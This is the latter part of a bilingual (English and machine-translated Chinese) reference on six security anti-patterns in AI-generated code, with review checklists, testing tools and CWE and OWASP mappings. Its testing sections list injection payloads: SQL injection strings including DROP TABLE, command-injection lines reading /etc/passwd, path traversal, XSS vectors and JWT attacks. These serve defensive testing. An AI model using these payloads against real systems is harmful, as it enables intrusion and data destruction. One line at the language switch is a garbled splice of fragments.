- Test with max length + 1 characters
- Test with min - 1 and max + 1 for numeric ranges
- Test with integer overflow values (2^31, 2^32, 2^64)
// 2. Type confusion testing
- Send array where string expected: {"email": ["test@test.com"]}
- Send object where string expected: {"email": {"$gt": ""}}
- Send number where string expected: {"email": 12345}
- Send boolean where string expected: {"email": true}
// 3. Encoding bypass testing
- URL encoding: %00, %2e%2e%2f
- Unicode encoding: \u0000, \u002e
- Double encoding: %2500
- Mixed case: %2E%2e%2F
// 4. Injection payload testing
- SQL: ' OR '1'='1, '; DROP TABLE users; --
- Command: ; ls, | cat /etc/passwd, `whoami`
- Path: ../../../etc/passwd, ....//....//
- XSS: <script>alert(1)</script>, javascript:alert(1)
// 5. ReDoS testing
- For each regex, test with pattern: (valid_char * 30) + invalid_char
- Measure response time - should be < 100ms
- Exponential time indicates ReDoS vulnerability
additionalProperties: false)^and为锚点的正则表达式模式$\x00, )。%00本文档全面涵盖了人工智能生成代码中最关键、最常见的六种安全漏洞。这些漏洞模式共同构成了人工智能辅助开发中绝大多数安全事件的根本原因。
| # | 图案 | 风险等级 | 人工智能频率 | 主要威胁 |
|---|---|---|---|---|
| 1 | 硬编码的秘密 | 批判的 | 非常高 | 凭证盗窃、API滥用、数据泄露 |
| 2 | SQL/命令注入 | 批判的 | 高的 | 数据库入侵、远程代码执行、系统接管 |
| 3 | 跨站脚本攻击(XSS) | 高的 | 非常高 | 会话劫持、账户接管、篡改 |
| 4 | 身份验证/会话 | 批判的 | 高的 | 完全绕过身份验证,权限提升 |
| 5 | 加密故障 | 高的 | 非常高 | 数据解密、凭证泄露、伪造 |
| 6 | 输入验证 | 高的 | 非常高 | 启用所有其他注入攻击 |
它们之间相互关联:输入验证失败会导致注入攻击;加密漏洞会暴露原本由硬编码凭证保护的机密信息;身份验证漏洞会使跨站脚本攻击(XSS)更具破坏性。
人工智能模型在所有这些方面都面临挑战:训练数据中包含无数不安全模式的示例。人工智能模型优化的是“可运行的代码”,而不是“安全的代码”。使代码安全的模式通常是不可见的(例如环境变量、参数化查询、正确的编码),而不安全模式则是显式且可见的。
它们会产生叠加效应:一个硬编码的密钥就可能暴露数千名用户;一次 SQL 注入就可能导致整个数据库崩溃;一次 XSS 漏洞就可能跨会话和跨用户持续存在。
这些简明扼要的检查清单为每种模式提供了快速参考。可在代码审查期间或提交更改之前使用。
| ✓ | 检查点 |
|---|---|
| □ | 源文件中不包含 API 密钥、密码或令牌 |
| □ | 所有密钥均从环境变量或密钥管理器加载 |
| □ | .env文件中.gitignore包含.env.example模板 |
| □ | 日志、错误信息或URL中不包含任何秘密信息。 |
| □ | CI/CD 管道中已启用秘密扫描 |
| □ | 证书定期轮换,且轮换过程自动化。 |
| ✓ | 检查点 |
|---|---|
| □ | 所有 SQL 查询均使用参数化语句(不使用字符串拼接)。 |
| □ | 动态标识符(表/列名)已根据允许列表进行验证 |
| □ | 审查 ORM 查询是否存在原始查询漏洞 |
| □ | Shell 命令避免用户输入;如有必要,请使用允许列表验证。 |
| □ | 二阶注入已检查(查询中使用的存储数据) |
| □ | 预编译语句适用于所有查询类型(SELECT、INSERT、ORDER BY) |
| ✓ | 检查点 |
|---|---|
| □ | HTML 正文上下文的 HTML 编码 |
| □ | HTML属性(尤其是事件处理程序)的属性编码 |
| □ | JavaScript 内联脚本编码 |
| □ | URL 上下文的 URL 编码 |
| □ | 配置了严格策略的 CSP 标头(否unsafe-inline) |
| □ | innerHTML避免使用;使用textContent或框架安全的绑定。 |
| □ | 已测试针对突变型 XSS 的清理库 |
| ✓ | 检查点 |
|---|---|
| □ | 使用 bcrypt/Argon2 哈希算法(而非 MD5/SHA1 算法)对密码进行哈希处理 |
| □ | 会话令牌采用加密随机化技术生成(熵值超过 256 位) |
| □ | JWT算法已明确验证(alg: none被拒绝) |
| □ | 存储在 HttpOnly、Secure 和 SameSite Cookie 中的令牌 |
| □ | 注销时会话失效(服务器端) |
| □ | 用于密码/令牌验证的恒定时间比较 |
| □ | 对身份验证端点进行速率限制 |
| ✓ | 检查点 |
|---|---|
| □ | 对称加密采用 AES-256-GCM 或 ChaCha20-Poly1305 算法。 |
| □ | 每次加密操作都使用新的随机初始化向量/随机数。 |
| □ | CSPRNG 用于所有安全敏感的随机值 |
| □ | bcrypt/Argon2id 用于密码哈希(而非 PBKDF2 用于密码哈希) |
| □ | 密钥派生采用HKDF或PBKDF2,并进行适当的迭代。 |
| □ | 不使用 ECB 模式,不使用静态 IV,不使用 Math.random() |
| □ | MAC/签名验证的恒定时间比较 |
| ✓ | 检查点 |
|---|---|
| □ | 所有验证均在服务器端执行。 |
| □ | 使用模式验证additionalProperties: false |
| □ | 所有以^and为锚点的正则表达式模式$ |
| □ | 在正则表达式匹配之前,先检查长度限制。 |
| □ | 字符串输入中拒绝了空字节 |
| □ | 验证前已进行 Unicode 规范化 |
| □ | 显式类型强制转换及错误处理 |
// Automated Secret Detection
1. Pre-commit hooks with secret scanners:
- TruffleHog
- detect-secrets
- gitleaks
- git-secrets
2. CI/CD Pipeline Scanning:
- Run on every PR/MR
- Scan full git history on merge to main
- Block deployment on secret detection
3. Runtime Detection:
- Log analysis for credential patterns
- API request auditing for hardcoded keys
- Cloud provider secret exposure alerts
// Testing Checklist
- [ ] Scan all source files for API key patterns
- [ ] Scan all config files for password strings
- [ ] Check git history for past secret commits
- [ ] Verify environment variables are properly loaded
- [ ] Test application behavior when secrets are missing
- [ ] Verify secrets are not exposed in error messages
// Automated Testing Tools
1. SAST (Static Analysis):
- Semgrep with injection rules
- CodeQL injection queries
- SonarQube SQL injection checks
2. DAST (Dynamic Analysis):
- SQLMap for SQL injection
- Burp Suite active scanning
- OWASP ZAP automated scan
3. Manual Testing Payloads:
// SQL Injection
- Single quote: '
- Comment: -- or #
- Boolean: ' OR '1'='1
- Time-based: '; WAITFOR DELAY '0:0:10'--
- Union: ' UNION SELECT null,null--
// Command Injection
- Semicolon: ;whoami
- Pipe: |id
- Backticks: `whoami`
- Command substitution: $(whoami)
- Newline: %0a id
// Testing Checklist
- [ ] Test all user input fields with injection payloads
- [ ] Test ORDER BY, LIMIT, table name parameters
- [ ] Test stored data for second-order injection
- [ ] Test file paths for command injection
- [ ] Verify all queries use parameterization
- [ ] Check logs don't reveal injection success/failure
// Automated Testing
1. Browser Tools:
- DOM Invader (Burp)
- XSS Hunter
- DOMPurify testing mode
2. Automated Scanners:
- Burp Suite XSS scanner
- OWASP ZAP active scan
- Nuclei XSS templates
3. Manual Testing Payloads:
// HTML Context
- <script>alert(1)</script>
- <img src=x onerror=alert(1)>
- <svg onload=alert(1)>
// Attribute Context
- " onmouseover="alert(1)
- ' onfocus='alert(1)' autofocus='
// JavaScript Context
- '-alert(1)-'
- ';alert(1)//
- \u003cscript\u003e
// URL Context
- javascript:alert(1)
- data:text/html,<script>alert(1)</script>
// Testing Checklist
- [ ] Test all output points with context-specific payloads
- [ ] Test encoding bypass techniques
- [ ] Test DOM XSS with source/sink analysis
- [ ] Verify CSP headers block inline scripts
- [ ] Test mutation XSS with sanitizer bypass payloads
- [ ] Check for polyglot XSS across contexts
// Testing Tools
1. Session Analysis:
- Burp Suite session handling
- OWASP ZAP session management
- Custom scripts for token analysis
2. JWT Testing:
- jwt.io debugger
- jwt_tool
- jose library testing
3. Manual Testing:
// Session Token Analysis
- Check entropy (should be 256+ bits)
- Test token predictability
- Test session fixation
// JWT Attacks
- Algorithm confusion (RS256 → HS256)
- None algorithm bypass
- Key injection attacks
- Signature stripping
// Authentication Bypass
- SQL injection in login
- Password reset token prediction
- OAuth state parameter manipulation
// Testing Checklist
- [ ] Test session token randomness
- [ ] Verify session invalidation on logout
- [ ] Test for session fixation
- [ ] Verify JWT algorithm validation
- [ ] Test rate limiting on login
- [ ] Check for timing attacks on password comparison
- [ ] Test password reset flow for token issues
// Crypto Testing Tools
1. Static Analysis:
- Semgrep crypto rules
- CryptoGuard
- Crypto-detector
2. Manual Review:
// Check for weak algorithms:
grep -r "MD5\|SHA1\|DES\|RC4\|ECB" .
// Check for static IVs:
grep -r "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" .
// Check for weak randomness:
grep -r "Math\.random\|random\.random\|rand\(\)" .
3. Runtime Testing:
- Encrypt same plaintext twice, verify different ciphertext
- Test key derivation iterations (should take 100ms+)
- Verify timing consistency in comparisons
// Testing Checklist
- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage
- [ ] Confirm unique IV/nonce per encryption
- [ ] Test password hashing takes appropriate time (100ms+)
- [ ] Verify CSPRNG used for all secrets
- [ ] Check key derivation iteration counts
- [ ] Test for padding oracle vulnerabilities
- [ ] Verify constant-time comparison functions
// Testing Approach
1. Boundary Testing:
- Empty strings, null, undefined
- Max length + 1
- Integer boundaries (MAX_INT, MIN_INT)
- Unicode normalization variants
2. Type Confusion:
- Array where string expected: ["value"]
- Object where string expected: {"$gt": ""}
- Number where string expected: 12345
- Boolean where object expected: true
3. Encoding Bypass:
- URL encoding: %00, %2e%2e%2f
- Unicode: \u0000, \ufeff
- Double encoding: %252e
- Overlong UTF-8
4. ReDoS Testing:
- For each regex, test with: (valid_char * 30) + invalid_char
- Measure response time (should be < 100ms)
- Use regex-dos-detector tools
// Testing Checklist
- [ ] Test all endpoints with null/empty values
- [ ] Test numeric fields with boundary values
- [ ] Test string fields with max length exceeded
- [ ] Test type confusion for all input fields
- [ ] Test regex patterns for ReDoS
- [ ] Verify server-side validation matches client-side
- [ ] Test Unicode normalization issues
本深度文档详细介绍了 6 种最关键的安全模式。有关其他安全反模式的介绍,请参阅 [[ANTI_PATTERNS_BREADTH]],其中包括:
| 图案类别 | 涵盖的模式 |
|---|---|
| 文件系统安全 | 路径遍历、不安全的文件上传、不安全的临时文件 |
| 访问控制 | 缺少授权检查、IDOR、权限提升 |
| 网络安全 | SSRF攻击、不安全的反序列化、未经验证的重定向 |
| 错误处理 | 信息泄露、堆栈跟踪、详细错误 |
| 日志记录安全 | 日志中包含敏感数据,日志记录不完整。 |
| 并发性 | 竞态条件、TOCTOU、僵局 |
| 依赖安全 | 过时的依赖项、恶意占位、篡改锁定文件 |
| 配置 | 生产环境中的调试模式,默认凭据 |
| API 安全性 | 大量分配、过度数据暴露、速率限制 |
使用广度文档可以快速查阅多种模式。使用深度文档可以全面理解最关键的模式。
| 图案 | OWASP 速查表 |
|---|---|
| 秘密管理 | 秘密管理速查表 |
| SQL注入 | 查询参数化速查表 |
| XSS | XSS 防护速查表 |
| 验证 | 身份验证速查表 |
| 会话管理 | 会话管理速查表 |
| 密码学 | 加密存储速查表 |
| 输入验证 | 输入验证速查表 |
| 图案 | 原发性 CWEs |
|---|---|
| 硬编码的秘密 | CWE-798、CWE-259、CWE-321、CWE-200 |
| SQL注入 | CWE-89、CWE-564 |
| 命令注入 | CWE-78、CWE-77 |
| XSS | CWE-79、CWE-80、CWE-83、CWE-87 |
| 验证 | CWE-287、CWE-384、CWE-613、CWE-307 |
| 会话安全 | CWE-384、CWE-613、CWE-614、CWE-1004 |
| 加密故障 | CWE-327、CWE-328、CWE-329、CWE-338、CWE-916 |
| 输入验证 | CWE-20、CWE-1333、CWE-185、CWE-176 |
| 工具 | 目的 | URL |
|---|---|---|
| 塞姆格雷普 | 使用安全规则进行静态分析 | https://semgrep.dev |
| CodeQL | GitHub 安全查询 | https://codeql.github.com |
| 松露猪 | 秘密扫描 | https://github.com/trufflesecurity/trufflehog |
| SQLMap | SQL注入测试 | https://sqlmap.org |
| Burp Suite | 网络安全测试 | https://portswigger.net/burp |
| OWASP ZAP | 开源网络安全扫描器 | https://www.zaproxy.org |
| jwt_tool | JWT 安全测试 | https://github.com/ticarpi/jwt_tool |
| Git泄露 | Git 秘密扫描 | https://github.com/gitleaks/gitleaks |
文档: AI 代码安全反模式:深度版本 版本: 1.0.0 最后更新: 2026-01-18 涵盖模式: 6 种(硬编码密钥、SQL/命令注入、XSS、身份验证/会话、密码学、输入验证)
| 日期 | 版本 | 变化 |
|---|---|---|
| 2026-01-18 | 1.0.0 | 首发版本包含 6 个全面的模式深度分析 |
本文档是人工智能代码安全反模式项目的一部分。安全模式会随着新研究的出现和人工智能模型的更新而不断演变。欢迎就以下方面做出贡献:
本文档旨在包含在 AI 助手上下文窗口中,以提高生成代码的安全性。为达到最佳效果,在审查或生成安全敏感代码时,请将其与 [[ANTI_PATTERNS_BREADTH]] 一起包含。